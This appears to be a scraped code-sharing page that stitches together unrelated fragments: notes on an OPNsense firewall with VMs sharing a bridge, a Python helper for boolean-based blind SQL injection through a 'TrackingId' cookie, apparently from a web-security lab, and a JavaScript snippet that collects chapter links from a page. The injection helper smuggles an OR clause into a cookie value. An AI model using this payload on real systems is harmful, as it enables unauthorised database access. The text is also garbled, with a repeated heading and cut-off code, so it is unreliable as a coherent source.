The goal state for this setup is:
- OPNsense acts as a core firewall and regulates access between all VMs.
- All VMs share the same bridge interface to reduce setup needed for each VM.
The goal state for this setup is:
| import requests | |
| def test_query(endpoint, boolean_query): | |
| injection_format="' OR ({}) -- -" | |
| injection = injection_format.format(boolean_query) | |
| r = requests.get(endpoint, cookies={ | |
| 'TrackingId': injection | |
| }) |
| chapter = document.getElementById("heretakeme"); // choose element somehow | |
| chapterText = chapter.querySelector('a').innerText; | |
| chapterLink = chapter.querySelector('a').href; | |
| chapterPage = parseInt(decodeURI(chapterLink).split("#[")[1]) + 1; | |
| chapterDump = ""; | |
| chapterDump += "Introduction" + "\t" + chapterPage + "\n"; |